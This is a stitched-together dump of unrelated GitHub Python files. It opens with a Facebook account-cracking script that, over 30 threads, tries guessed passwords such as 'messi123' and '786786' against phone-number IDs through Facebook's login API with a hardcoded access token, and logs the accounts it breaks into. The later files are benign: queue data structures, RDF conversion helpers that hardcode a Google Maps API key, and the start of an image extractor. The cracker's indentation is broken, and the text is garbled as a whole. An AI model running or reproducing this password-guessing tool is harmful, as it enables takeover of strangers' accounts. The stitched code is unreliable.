vuln = "\033[32mVuln"
os.system("clear")
print """
\033[0;39m██╗░░██╗██╗███╗░░██╗░██████╗░
\033[0;39m██║░██╔╝██║████╗░██║██╔════╝░
\033[0;39m█████═╝░██║██╔██╗██║██║░░██╗░
\033[0;39m██╔═██╗░██║██║╚████║██║░░╚██╗
\033[0;39m██║░╚██╗██║██║░╚███║╚██████╔╝
╚═╝░░╚═╝╚═╝╚═╝░░╚══╝░╚═════╝░ Sarfaraz Naheed
\033[1;96m---------------------------------------
\033[1;94mCreater : \033[1;93mNaheed Bhai
\033[1;94mFacebook: \033[1;93mBoro Bhai
\033[1;94mIts Not A Name Its Brand \033[1;92mNaheed
\033[1;96m------------------------------------------
"""
####Logo####
logo1 = """
\033[0;39m██╗░░██╗██╗███╗░░██╗░██████╗░
\033[0;39m██║░██╔╝██║████╗░██║██╔════╝░
\033[0;39m█████═╝░██║██╔██╗██║██║░░██╗░
\033[0;39m██╔═██╗░██║██║╚████║██║░░╚██╗
\033[0;39m██║░╚██╗██║██║░╚███║╚██████╔╝
╚═╝░░╚═╝╚═╝╚═╝░░╚══╝░╚═════╝░ Sarfaraz Naheed
\033[1;96m---------------------------------------
\033[1;94mCreater : \033[1;93mNaheed Bhai
\033[1;94mFacebook: \033[1;93mBoro Bhai
\033[1;94mIts Not A Name Its Brand \033[1;92mNaheed
\033[1;96m-----------------------------------------
"""
logo2 = """
\033[0;39m██╗░░██╗██╗███╗░░██╗░██████╗░
\033[0;39m██║░██╔╝██║████╗░██║██╔════╝░
\033[0;39m█████═╝░██║██╔██╗██║██║░░██╗░
\033[0;39m██╔═██╗░██║██║╚████║██║░░╚██╗
\033[0;39m██║░╚██╗██║██║░╚███║╚██████╔╝
╚═╝░░╚═╝╚═╝╚═╝░░╚══╝░╚═════╝░ Sarfaraz Naheed
\033[1;96m----------------------------------------
\033[1;94mCreater : \033[1;93mNaheed Bhai
\033[1;94mFacebook: \033[1;93mBoro Bhai
\033[1;94mIts Not A Name Its Brand \033[1;92mNaheed
\033[1;96m-----------------------------------------
"""
CorrectPasscode = "a"
loop = 'true'
while (loop == 'true'):
passcode = raw_input("\033[1;92m[?] \x1b[1;97mPASSWORD \x1b[1;97m: ")
if (passcode == CorrectPasscode):
print """
\033[1;92mCORRECT
"""
loop = 'false'
else:
print "\033[1;91mWRONG"
##### LICENSE #####
#=================#
def lisensi():
os.system('clear')
login()
####login#########
def login():
os.system('clear')
print logo1
print "\033[1;93m[1]\x1b[1;94mStart cloning "
time.sleep(0.05)
print '\x1b[1;93m[0]\033[1;94m Exit'
pilih_login()
def pilih_login():
peak = raw_input("\n\033[1;95mCHOOSE: \033[1;95m")
if peak =="":
print "\x1b[1;95mFill In Correctly"
pilih_login()
elif peak =="1":
Zeek()
def Zeek():
os.system('clear')
print logo1
print '\x1b[1;94m[1] Start Cracking'
time.sleep(0.05)
print '\x1b[1;94m[0] \033[1;93m Back'
time.sleep(0.05)
action()
def action():
peak = raw_input('\n\033[1;95mCHOOSE:\033[1;97m')
if peak =='':
print '[!] Fill In Correctly'
action()
elif peak =="1":
os.system("clear")
print logo2
print "Enter (1st) any 2 digit mobile code Number"+'\n'
try:
k= raw_input("\033[1;96mCHOOSE : ")
print 'Enter (2nd) any 2 digit uk sim code'
try:
c = raw_input("\033[1;96mCHOOSE : ")
idlist = ('.txt')
for line in open(idlist,"r").readlines():
id.append(line.strip())
except IOError:
print ("[!] File Not Found")
raw_input("\n[ Back ]")
blackmafiax()
elif peak =='0':
login()
else:
print '[!] Fill In Correctly'
action()
print 50* '\033[1;91m-'
xxx = str(len(id))
jalan ('\033[1;92m Total ids number: '+xxx)
jalan ('\033[1;92mCode you choose: '+c)
jalan ("\033[1;92mWait... Start Cracking...")
jalan ("\033[1;92mTo Stop Process Press Ctrl+z")
print 50* '\033[1;91m-'
def main(arg):
global cpb,oks
user = arg
try:
os.mkdir('save')
except OSError:
pass
try:
pass1 = user
data = br.open('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=1&email=' +k+c+user+ '&locale=en_US&password=' + pass1 + '&sdk=ios&generate_session_cookies=1&sig=3f555f98fb61fcd7aa0c44f58f522efm')
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;93m[OK] ' + k + c + user + ' | ' + pass1
okb = open('save/cloned.txt', 'a')
okb.write(k+c+user+pass1+'\n')
okb.close()
oks.append(c+user+pass1)
else:
if 'www.facebook.com' in q['error_msg']:
print '\033[1;93m[CP] ' + k + c + user + ' | ' + pass1
cps = open('save/cloned.txt', 'a')
cps.write(k+c+user+pass1+'\n')
cps.close()
cpb.append(c+user+pass1)
else:
pass2 = k + c + user
data = br.open('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=1&email=' +k+c+user+ '&locale=en_US&password=' + pass2 + '&sdk=ios&generate_session_cookies=1&sig=3f555f98fb61fcd7aa0c44f58f522efm')
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;93m[OK] ' + k + c + user + ' | ' + pass2
okb = open('save/cloned.txt', 'a')
okb.write(k+c+user+pass2+'\n')
okb.close()
oks.append(c+user+pass2)
else:
if 'www.facebook.com' in q['error_msg']:
print '\033[1;93m[CP] ' + k + c + user + ' | ' + pass2
cps = open('save/cloned.txt', 'a')
cps.write(k+c+user+pass2+'\n')
cps.close()
cpb.append(c+user+pass2)
else:
pass3="messi123"
data = br.open('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=1&email=' +k+c+user+ '&locale=en_US&password=' + pass3 + '&sdk=ios&generate_session_cookies=1&sig=3f555f98fb61fcd7aa0c44f58f522efm')
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;93m[OK] ' + k + c + user + ' | ' + pass3
okb = open('save/cloned.txt', 'a')
okb.write(k+c+user+pass3+'\n')
okb.close()
oks.append(c+user+pass3)
else:
if 'www.facebook.com' in q['error_msg']:
print '\033[1;93m[CP] ' + k + c + user + ' | ' + pass3
cps = open('save/cloned.txt', 'a')
cps.write(k+c+user+pass3+'\n')
cps.close()
cpb.append(c+user+pass3)
else:
pass4= "london123'
data = br.open('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=1&email=' +k+c+user+ '&locale=en_US&password=' + pass4 + '&sdk=ios&generate_session_cookies=1&sig=3f555f98fb61fcd7aa0c44f58f522efm')
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;93m[OK] ' + k + c + user + ' | ' + pass4
okb = open('save/cloned.txt', 'a')
okb.write(k+c+user+pass4+'\n')
okb.close()
oks.append(c+user+pass4)
else:
if 'www.facebook.com' in q['error_msg']:
print '\033[1;93m[CP] ' + k + c + user + ' | ' + pass4
cps = open('save/cloned.txt', 'a')
cps.write(k+c+user+pass4+'\n')
cps.close()
cpb.append(c+user+pass4)
else:
pass5="786786"
data = br.open('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=1&email=' +k+c+user+ '&locale=en_US&password=' + pass5 + '&sdk=ios&generate_session_cookies=1&sig=3f555f98fb61fcd7aa0c44f58f522efm')
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;93m[OK] ' + k + c + user + ' | ' + pass5
okb = open('save/cloned.txt', 'a')
okb.write(k+c+user+pass5+'\n')
okb.close()
oks.append(c+user+pass5)
else:
if 'www.facebook.com' in q['error_msg']:
print '\033[1;93m[CP] ' + k + c + user + ' | ' + pass5
cps = open('save/cloned.txt', 'a')
cps.write(k+c+user+pass5+'\n')
cps.close()
cpb.append(c+user+pass5)
except:
pass
p = ThreadPool(30)
p.map(main, id)
print 50* '\033[1;91m-'
print 'Process Has Been Completed ...'
print 'Total Online/Offline : '+str(len(oks))+'/'+str(len(cpb))
print('Cloned Accounts Has Been Saved : save/cloned.txt')
jalan("Note : Your Offline account Will Open after 10 to 20 days")
print ''
print """
\033[0;39m██╗░░██╗██╗███╗░░██╗░██████╗░
\033[0;39m██║░██╔╝██║████╗░██║██╔════╝░
\033[0;39m█████═╝░██║██╔██╗██║██║░░██╗░
\033[0;39m██╔═██╗░██║██║╚████║██║░░╚██╗
\033[0;39m██║░╚██╗██║██║░╚███║╚██████╔╝
╚═╝░░╚═╝╚═╝╚═╝░░╚══╝░╚═════╝░ Sarfaraz Naheed
\033[1;96mThanks me later
\033[1;96m my contacts
\033[1;95mFb\033[1;97mQaiserAbbas
\033[1;95myoutube\033[1;97mhttps://www.youtube.com/channel/UCHetqAquUkojxVvPebQpb0g"""
raw_input("\n\033[1;92m[\033[1;92mBack\033[1;95m]")
login()
if __name__ == '__main__':
login()
| [
"noreply@github.com"
] | chotobhaiback.noreply@github.com |
1c22246d8eaaf0be1c4f1638d45fd225ca7a09fb | fe47186a51d47fcc61672ab16a2cda930306ad3d | /pybook/queue.py | 6cdac67fadccf059e3bce533fac09b2ed2fef135 | [] | no_license | mannyanebi/data-structures | 3845878e7e95717322e395987efaf0d19212beda | b7b9544ff9148aacda1ca3bb8c5e4067c2f5ccdf | refs/heads/master | 2023-02-18T14:42:34.549387 | 2021-01-20T10:30:22 | 2021-01-20T10:30:22 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,777 | py | """ List-based queue"""
class ListQueue:
    """FIFO queue backed by a plain Python list.

    New items are inserted at index 0, so the oldest item always sits at
    the end of the list and is removed with a cheap ``pop()``.
    """

    def __init__(self):
        self.items = []  # index 0 = newest, index -1 = oldest
        self.size = 0    # number of queued items

    def enqueue(self, data):
        """Add *data* to the back of the queue (O(n) list insert)."""
        self.items.insert(0, data)
        self.size += 1

    def dequeue(self):
        """Remove and return the oldest item (IndexError when empty)."""
        oldest = self.items.pop()
        self.size -= 1
        return oldest
""" Stack-based queue """
class StackQueue:
    """FIFO queue built from two LIFO stacks.

    ``enqueue`` pushes onto the inbound stack; ``dequeue`` pops from the
    outbound stack, refilling it (reversed) from the inbound stack only
    when it runs dry — amortized O(1) per operation.
    """

    def __init__(self):
        self.inbound_stack = []
        self.outbound_stack = []

    def enqueue(self, data):
        """Push *data* onto the inbound stack."""
        self.inbound_stack.append(data)

    def dequeue(self):
        """Pop and return the oldest element (IndexError when empty)."""
        if not self.outbound_stack:
            # Drain the inbound stack; the reversal restores FIFO order.
            while self.inbound_stack:
                self.outbound_stack.append(self.inbound_stack.pop())
        return self.outbound_stack.pop()
# Demo: exercise StackQueue and show how elements migrate between the
# two internal stacks as items are enqueued and dequeued.
queue = StackQueue()
queue.enqueue(5)
queue.enqueue(6)
queue.enqueue(7)
# All three items still sit on the inbound stack: [5, 6, 7]
print(queue.inbound_stack)
# First dequeue drains inbound into outbound (reversed) and pops 5.
queue.dequeue()
print(queue.inbound_stack)
print(queue.outbound_stack)
# Second dequeue pops 6 straight off the outbound stack.
queue.dequeue()
print(queue.outbound_stack)
""" Node-based queue """
class Node:
    """Singly linked list node holding *data* and a link to the next node."""

    def __init__(self, data=None):
        self.data = data  # payload stored in this node
        self.next = None  # following node, or None at the end of the list
class Queue:
def __init__(self):
self.head = None
self.tail = None
self.count = 0
def enqueue(self, data):
new_node = Node(data)
if self.head is None:
self.head = new_node
self.tail = self.head
else:
new_node.prev = self.tail
self.tail.next = new_node
self.tail = new_node
self.count += 1
def dequeue(self):
current = self.head
if self.count == 1:
self.count -= 1
self.head = None
self.tail = None
elif self.count > 1:
self.head = self.head.next
self.head.prev = None
self.count -= 1
return current
""" Media player queue"""
from random import randint
class Track:
    """A playable track with a title and a pseudo-random length (5-10 s)."""

    def __init__(self, title=None):
        self.title = title
        # Simulated track duration in seconds, chosen at creation time.
        self.length = randint(5, 10)
import time
class MediaPlayerQueue(Queue):
    """Queue of Track objects that can be played back in FIFO order."""

    def __init__(self):
        super(MediaPlayerQueue, self).__init__()

    def add_track(self, track):
        """Queue *track* for later playback."""
        self.enqueue(track)

    def play(self):
        """Play every queued track in order, sleeping for its length."""
        while self.count > 0:
            node = self.dequeue()
            print("Now playing {}".format(node.data.title))
            time.sleep(node.data.length)
# Demo: build a small playlist and play it back.
track1 = Track("white whistle")
track2 = Track("butter butter")
track3 = Track("Oh black star")
track4 = Track("Watch that chicken")
track5 = Track("Don't go")
# Lengths are random per run (5-10 seconds each).
print(track1.length)
print(track2.length)
media_player = MediaPlayerQueue()
media_player.add_track(track1)
media_player.add_track(track2)
media_player.add_track(track3)
media_player.add_track(track4)
media_player.add_track(track5)
# Blocks while "playing": sleeps for each track's length in turn.
media_player.play()
| [
"achinonso@gmail.com"
] | achinonso@gmail.com |
f5e421b2c2cc53b922c6ad9815e5b4c19d3ccf93 | 0f9f73ad6415510c786df2fd5f134d2a3ea2c71f | /converters.py | 3c460042fbdad63e85631b436342ee787e848aa2 | [] | no_license | SemanticComputing/cemeteries-csv2rdf | 2ca226a88d40cc5a5e558b15e3c2c350613e7a8b | 6d8b406189a39e687b214a83077a3928c7cde125 | refs/heads/master | 2021-01-19T11:08:46.953041 | 2018-04-05T12:52:53 | 2018-04-05T12:52:53 | 87,931,235 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 10,426 | py | #!/usr/bin/env python3
# -*- coding: UTF-8 -*-
"""
Converters for CSV cell data
"""
import datetime
import logging
import re
import requests
from rdflib import Graph, Literal
from slugify import slugify
from namespaces import *
log = logging.getLogger(__name__)
def convert_int(raw_value: str):
    """
    Convert a string to int when possible; otherwise return it unchanged.

    Empty/falsy values pass through untouched. A warning is logged for
    values that cannot be parsed as integers.

    :param raw_value: original string value
    :return: converted int, or the original value
    """
    if not raw_value:
        return raw_value
    try:
        converted = int(raw_value)
    except (ValueError, TypeError):
        log.warning('Invalid value for int conversion: %s' % raw_value)
        return raw_value
    log.debug('Converted int: %s' % raw_value)
    return converted
def convert_dates(raw_date: str):
    """
    Convert a date string (``d/m/Y`` or ``d.m.Y``) to a ``datetime.date``.

    :param raw_date: raw date string from the CSV
    :return: ISO 8601 compliant date if it can be parsed, otherwise the
        original value
    """
    if not raw_date:
        return raw_date
    cleaned = str(raw_date).strip()
    # Try each accepted input format in turn; first match wins.
    for fmt in ('%d/%m/%Y', '%d.%m.%Y'):
        try:
            date = datetime.datetime.strptime(cleaned, fmt).date()
        except ValueError:
            continue
        log.debug('Converted date: %s to %s' % (raw_date, date))
        return date
    log.warning('Invalid value for date conversion: %s' % raw_date)
    return raw_date
def convert_person_name(raw_name: str):
    """
    Unify name syntax and split a raw name into first names and last name.

    The input is upper-cased and matched against a pattern that captures:
    group 1 = last name (optionally with a previous name, e.g. "X E. Y"),
    group 2 = an optional "VON" particle, group 3 = first names.

    :param raw_name: original name string
    :return: tuple (firstnames, lastname, fullname) — fullname is
        "Lastname, Firstnames" when first names exist
    """
    re_name_split = \
        r'([A-ZÅÄÖÜÉÓÁ/\-]+(?:\s+\(?E(?:NT)?[\.\s]+[A-ZÅÄÖÜÉÓÁ/\-]+)?\)?)\s*(?:(VON))?,?\s*([A-ZÅÄÖÜÉÓÁ/\- \(\)0-9,.]*)'
    fullname = raw_name.upper()
    namematch = re.search(re_name_split, fullname)
    # If the pattern fails to match, treat the whole string as a last name.
    (lastname, extra, firstnames) = namematch.groups() if namematch else (fullname, None, '')
    # Unify syntax for previous names: "X E. Y" / "X (ENT Y)" -> "X (ent. Y)"
    prev_name_regex = r'([A-ZÅÄÖÜÉÓÁ/\-]{2}) +\(?(E(?:NT)?[\.\s]+)([A-ZÅÄÖÜÉÓÁ/\-]+)\)?'
    lastname = re.sub(prev_name_regex, r'\1 (ent. \3)', str(lastname))
    # Title-case, but keep the "(ent. " marker lower-case.
    lastname = lastname.title().replace('(Ent. ', '(ent. ')
    firstnames = firstnames.title()
    if extra:
        # Re-attach a lower-cased "von" particle in front of the last name.
        extra = extra.lower()
        lastname = ' '.join([extra, lastname])
    fullname = lastname
    if firstnames:
        fullname += ', ' + firstnames
    log.debug('Name %s was unified to form %s' % (raw_name, fullname))
    # Warn when the normalization changed more than letter case.
    original_style_name = ' '.join((lastname, firstnames)) if firstnames else lastname
    if original_style_name.lower() != raw_name.lower():
        log.warning('New name %s differs from %s' % (original_style_name, raw_name))
    return firstnames, lastname, fullname
def create_event(uri_suffix, event_type, participant_prop, participant, participant_name, labels, timespan=None,
                 place=None, prop_sources=None, extra_information=None):
    """
    Create an event or add information to an existing one (by using a previously used URI).

    Builds and returns a new rdflib Graph describing the event; nothing is
    written anywhere else.

    :param uri_suffix: local name appended to EVENTS_NS to form the event URI
    :param event_type: URIRef for the event's rdf:type
    :param participant_prop: property linking the event to its participant
    :param participant: URIRef of the participant resource
    :param participant_name: name interpolated into the label templates
    :param labels: pair of label template strings (Finnish, English), each
        containing a ``{name}`` placeholder
    :param timespan: timespan tuple (begin, end) or a single date string
    :param place: URIRef (or string) for the target place
    :param prop_sources: iterable of source URIs attached to the timespan
        and place statements
    :param extra_information: list of (predicate, object) tuples added to
        the event resource as-is
    :return: rdflib Graph containing the event description
    """
    event = Graph()
    uri = EVENTS_NS[uri_suffix]
    event.add((uri, RDF.type, event_type))
    event.add((uri, participant_prop, participant))
    # Interpolate the participant name into the fi/en label templates.
    labels = (Literal(labels[0].format(name=participant_name), lang='fi'),
              Literal(labels[1].format(name=participant_name), lang='en'))
    for label in labels:
        event.add((uri, SKOS.prefLabel, label))
    # if event_source:
    #     event.add((uri, DC.source, event_source))
    if extra_information:
        for info in extra_information:
            event.add((uri,) + info)
    if timespan:
        # A single date is normalized to a (begin, end) pair.
        if type(timespan) != tuple:
            timespan = (timespan, timespan)
        timespan_uri = EVENTS_NS[uri_suffix + '_timespan']
        label = (timespan[0] + ' - ' + timespan[1]) if timespan[0] != timespan[1] else timespan[0]
        event.add((uri, CIDOC['P4_has_time-span'], timespan_uri))
        event.add((timespan_uri, RDF.type, CIDOC['E52_Time-Span']))
        event.add((timespan_uri, CIDOC.P82a_begin_of_the_begin, Literal(timespan[0], datatype=XSD.date)))
        event.add((timespan_uri, CIDOC.P82b_end_of_the_end, Literal(timespan[1], datatype=XSD.date)))
        event.add((timespan_uri, SKOS.prefLabel, Literal(label)))
        if prop_sources:
            for timespan_source in prop_sources:
                event.add((timespan_uri, DC.source, timespan_source))
    if place:
        property_uri = CIDOC['P7_took_place_at']
        event.add((uri, property_uri, place))
        if prop_sources:
            # TODO: Use singleton properties or PROV Ontology (https://www.w3.org/TR/prov-o/#qualifiedAssociation)
            for place_source in prop_sources:
                # USING (SEMI-)SINGLETON PROPERTIES TO DENOTE SOURCE:
                # a subproperty of P7 is minted per (place, source) pair.
                property_uri = DATA_NS['took_place_at_' + slugify(place) + '_' + slugify(place_source)]
                event.add((property_uri, DC.source, place_source))
                event.add((property_uri, RDFS.subClassOf, CIDOC['P7_took_place_at']))
    return event
def strip_dash(raw_value: str):
    """Return '' when the value is just a dash placeholder, else the value."""
    if raw_value.strip() == '-':
        return ''
    return raw_value
def add_trailing_zeros(raw_value):
    # NOTE(review): despite the name, this pads with *leading* zeros to a
    # width of 3 (e.g. '7' -> '007'). If raw_value is not numeric,
    # convert_int returns it as a string and format() then raises
    # ValueError — confirm callers only pass numeric strings.
    i = convert_int(raw_value)
    return format(i, '03d')
# http://en.proft.me/2015/09/20/converting-latitude-and-longitude-decimal-values-p/
def dms2dd(degrees, minutes, seconds, direction):
    """Convert degrees/minutes/seconds plus a compass direction to decimal degrees."""
    decimal = float(degrees) + float(minutes) / 60 + float(seconds) / (60 * 60)
    decimal = round(decimal, 8)
    # Southern and western coordinates are negative.
    if direction == 'S' or direction == 'W':
        decimal *= -1
    return decimal
def dd2dms(deg):
    """Convert decimal degrees to a [degrees, minutes, seconds] list."""
    whole_degrees = int(deg)
    fractional_minutes = abs(deg - whole_degrees) * 60
    minutes = int(fractional_minutes)
    seconds = (fractional_minutes - minutes) * 60
    return [whole_degrees, minutes, seconds]
def parse_coordinate(raw_value):
    # Parse a "xx.xx.xx.x"-style coordinate string into decimal degrees
    # via dms2dd(); returns None for empty / "ei_ole" ("does not exist")
    # / unrecognized values.
    if raw_value == '' or raw_value == 'ei_ole' :
        return None
    # Convert xx.xx.xx.x to xx°xx'xx"
    # strip whitespace
    raw_value = "".join(raw_value.split())
    # Only accept values whose third character separates degrees from
    # minutes. (The isspace() branch is dead: whitespace was stripped.)
    if raw_value[2] == '.' or raw_value[2].isspace() or raw_value[2] == ',':
        modified = list(raw_value)
        # remove double periods
        if modified[-1] == '.' and modified[-2] == '.':
            modified = modified[:-2]
        # remove periods from end
        if modified[-1] == '.':
            modified = modified[:-1]
        # Rewrite separators as degree/minute/second marks.
        modified[2] = u"\u00B0"
        modified[5] = '\''
        modified += '\"'
        new_value = "".join(modified)
    else:
        return None
    # Add direction
    # NOTE(review): the first branch appends to raw_value, not new_value,
    # so a missing ' N' is never actually added — likely a bug; also
    # endswith(' N') can never match since whitespace was stripped above.
    # Left as-is to avoid changing downstream behavior without data to
    # verify against.
    if not new_value.endswith(' N') and int(new_value[0:2]) > 59:
        raw_value += ' N'
    elif not new_value.endswith(' E') and int(new_value[0:2]) < 30:
        new_value += ' E'
    # parts = re.split('[^\d\w]+', dms)
    # Split into [degrees, minutes, seconds, direction].
    parts = re.split('[^\d\w\.]+', str(new_value))
    #print('original: ' + str(raw_value))
    # remove double periods from seconds
    if parts[2].count('.') > 1:
        oldstr = parts[2]
        newstr = oldstr[:3] + oldstr[4:]
        parts[2] = newstr
    return dms2dd(parts[0], parts[1], parts[2], parts[3])
def split_cemetery_name(raw_value):
    """
    Split a cemetery name into municipality parts.

    The raw value is either "Municipality, rest..." or
    "Current / Former, rest...", where the part after ' / ' is the
    NARC-style name beginning with the former municipality.

    :return: dict with keys current_municipality, former_municipality
        (None when absent) and narc_name
    """
    segments = raw_value.split(' / ')
    if len(segments) == 1:
        # No former municipality present; the whole value is the NARC name.
        return {'current_municipality': raw_value.split(',')[0],
                'former_municipality': None,
                'narc_name': raw_value}
    return {'current_municipality': segments[0],
            'former_municipality': segments[1].split(',')[0],
            'narc_name': segments[1]}
def geocode(raw_value):
    # Resolve an address string to {lat, lng, address} via the Google
    # Geocoding API. For "Current / Former" values only the part before
    # ' / ' is sent. Unresolvable addresses fall back to three hardcoded
    # known locations, or to a (60.0, 50.0, 'empty') placeholder.
    #
    # SECURITY NOTE(review): the API key below is hardcoded in source and
    # committed to the repository — it should be revoked and moved to an
    # environment variable or config file.
    GOOGLE_MAPS_API_URL = 'https://maps.googleapis.com/maps/api/geocode/json'
    if ' / ' in raw_value:
        input_adr = raw_value.split(' / ')[0]
    else:
        input_adr = raw_value
    params = {
        'address': input_adr,
        'sensor': 'false',
        'region': 'fi',
        'key': 'AIzaSyAz7aHBd-VrYm2T2neu8w0_TWy97otAb5I'
    }
    # Do the request and get the response data
    req = requests.get(GOOGLE_MAPS_API_URL, params=params)
    res = req.json()
    geodata = dict()
    # check if there are no results
    if len(res['results']) == 0:
        # Hardcoded fallbacks for known addresses Google cannot resolve.
        if (raw_value) == 'Tehtaankirkontie 5, 73500 Juankoski':
            geodata['lat'] = 63.064402
            geodata['lng'] = 28.329469
            geodata['address'] = 'Tehtaankirkontie 5, 73500 Juankoski'
        elif (raw_value) == 'Hiittistentie 2, 25940 Hiittinen':
            geodata['lat'] = 59.891527
            geodata['lng'] = 22.522370
            geodata['address'] = 'Hiittistentie 2, 25940 Hiittinen'
        elif (raw_value) == 'Mäntysaari, 47910 Hillosensalmi':
            geodata['lat'] = 61.191018
            geodata['lng'] = 26.762769
            geodata['address'] = 'Mäntysaari, 47910 Hillosensalmi'
        else:
            # Unknown address: log it to stdout and return a placeholder.
            print(input_adr)
            print(res)
            geodata['lat'] = 60.0
            geodata['lng'] = 50.0
            adr = 'empty'
            geodata['address'] = adr
            return(geodata)
    else:
        # Use the first result
        result = res['results'][0]
        geodata['lat'] = result['geometry']['location']['lat']
        geodata['lng'] = result['geometry']['location']['lng']
        adr = result['formatted_address'].rsplit(',', 1)[0] # remove country from address
        geodata['address'] = adr
    #print('{address}. (lat, lng) = ({lat}, {lng})'.format(**geodata))
    return geodata
| [
"esko.ikkala@aalto.fi"
] | esko.ikkala@aalto.fi |
b68e3f57c78af07e7e4e65232453565ad87c02a7 | a5b66100762c0ca7076de26645ef1b732e0ee2d8 | /python_toolbox/combi/__init__.py | 40c9544dc3e488bf610098b9b0ef4a3c5a5d5772 | [
"MIT",
"BSD-3-Clause",
"Apache-2.0"
] | permissive | cool-RR/python_toolbox | 63400bbc004c63b32fe421b668a64bede4928e90 | cb9ef64b48f1d03275484d707dc5079b6701ad0c | refs/heads/master | 2022-01-26T14:41:29.194288 | 2021-12-25T06:49:40 | 2021-12-25T06:49:40 | 3,066,283 | 130 | 15 | NOASSERTION | 2021-12-25T06:49:41 | 2011-12-29T01:39:51 | Python | UTF-8 | Python | false | false | 582 | py | # Copyright 2009-2017 Ram Rachum.
# This program is distributed under the MIT license.
from python_toolbox.math_tools import binomial
from python_toolbox.nifty_collections import (Bag, OrderedBag, FrozenBag,
FrozenOrderedBag)
from .chain_space import ChainSpace
from .product_space import ProductSpace
from .map_space import MapSpace
from .selection_space import SelectionSpace
from .perming import (PermSpace, CombSpace, Perm, UnrecurrentedPerm, Comb,
UnrecurrentedComb, UnallowedVariationSelectionException)
| [
"ram@rachum.com"
] | ram@rachum.com |
98a40dfcf96e898fc04e6268b9f887385f2dd236 | 253d0d26137b5fe4b984c7ee2fc4db7079406d98 | /sessionproject2/manage.py | 02dd1ad7d15a83f193f378106e92c899b192052b | [] | no_license | vikashtiwary118/django-session-project2 | b3f7d06fcedb4e66380c28fefabbcb191e0301cd | 663e2d178953dbf4e0b1e85dfecc059f0bfe4682 | refs/heads/master | 2020-08-06T18:10:42.396779 | 2019-10-06T03:19:32 | 2019-10-06T03:19:32 | 213,102,453 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 547 | py | #!/usr/bin/env python
import os
import sys
def main():
    """Run Django's command-line utility for this project.

    Points Django at the project settings, then hands argv to the
    management command dispatcher.
    """
    os.environ.setdefault("DJANGO_SETTINGS_MODULE", "sessionproject2.settings")
    try:
        from django.core.management import execute_from_command_line
    except ImportError as exc:
        # Re-raise with a hint about the usual causes (missing install / venv).
        raise ImportError(
            "Couldn't import Django. Are you sure it's installed and "
            "available on your PYTHONPATH environment variable? Did you "
            "forget to activate a virtual environment?"
        ) from exc
    execute_from_command_line(sys.argv)


if __name__ == "__main__":
    main()
| [
"tiwaryvikash118@gmail.com"
] | tiwaryvikash118@gmail.com |
f845d484fcd45bd00b99b517730a82ce2ee58d0b | 0eaf0d3f0e96a839f2ef37b92d4db5eddf4b5e02 | /abc229/b.py | 5bfe4de8c5054616cf3e4adac546cb626bde495d | [] | no_license | silphire/atcoder | b7b02798a87048757745d99e8564397d1ca20169 | f214ef92f13bc5d6b290746d5a94e2faad20d8b0 | refs/heads/master | 2023-09-03T17:56:30.885166 | 2023-09-02T14:16:24 | 2023-09-02T14:16:24 | 245,110,029 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 184 | py | a, b = input().rstrip().split()
# Walk both numbers from the least-significant digit by reversing them.
a = a[::-1]
b = b[::-1]
for da, db in zip(a, b):
    # A column summing to 10 or more produces a carry -> "Hard".
    if int(da) + int(db) >= 10:
        print('Hard')
        exit()
print('Easy')
| [
"silphire@gmail.com"
] | silphire@gmail.com |
c1d0df4a31f85bb2d72d99fea4a7077f1ee4319e | b05fee086482565ef48785f2a9c57cfe2c169f68 | /part_one/8-abs_factory_pattern/after/factories/ford_factory.py | 1259f7dc09794969157c2515bc46ac2188cc49c1 | [] | no_license | diegogcc/py-design_patterns | 76db926878d5baf9aea1f3d2f6a09f4866c3ce1e | 2b49b981f2d3514bbd02796fe9a8ec083df6bb38 | refs/heads/master | 2023-04-01T08:28:53.211024 | 2021-04-05T11:48:19 | 2021-04-05T11:48:19 | 304,145,791 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 410 | py | from .abs_factory import AbsFactory
from autos.ford.fiesta import FordFiesta
from autos.ford.mustang import FordMustang
from autos.ford.lincoln import LincolnMKS
class FordFactory(AbsFactory):
    """Concrete factory that assembles the Ford family of vehicles.

    Each creator returns a freshly constructed model for its tier.
    """

    @staticmethod
    def create_luxury():
        """Luxury tier: the Lincoln MKS."""
        return LincolnMKS()

    @staticmethod
    def create_sport():
        """Sport tier: the Ford Mustang."""
        return FordMustang()

    @staticmethod
    def create_economy():
        """Economy tier: the Ford Fiesta."""
        return FordFiesta()
"diegoc906@gmail.com"
] | diegoc906@gmail.com |
e7eae1b3ccf9f4fcfc7962f970a6fb64443a01e9 | 273e10ea9b13b9cbc49f21e618d5b04da22f2465 | /bin2tif/terra_bin2tif.py | aeed1a3ef93f92ccce890a57455caf6f6a22316a | [] | no_license | solmazhajmohammadi/extractors-stereo-rgb | d08e3ba8548d466c92a324640fa4ef1107667a8d | 95bad367e725611404517a64438a10629d50e6f9 | refs/heads/master | 2021-01-21T18:59:18.122484 | 2017-05-22T20:49:33 | 2017-05-22T20:49:33 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 11,588 | py | #!/usr/bin/env python
"""
This extractor triggers when a file is added to a dataset in Clowder.
It checks for _left and _right BIN files to convert them into
JPG and TIF formats.
"""
import os
import logging
import shutil
import datetime
from pyclowder.extractors import Extractor
from pyclowder.utils import CheckMessage
import pyclowder.files
import pyclowder.datasets
import terrautils.extractors
import bin_to_geotiff as bin2tiff
class StereoBin2JpgTiff(Extractor):
    """Clowder extractor converting stereoTop left/right BIN pairs to JPG and geoTIFF.

    check_message() filters incoming dataset events; process_message() performs
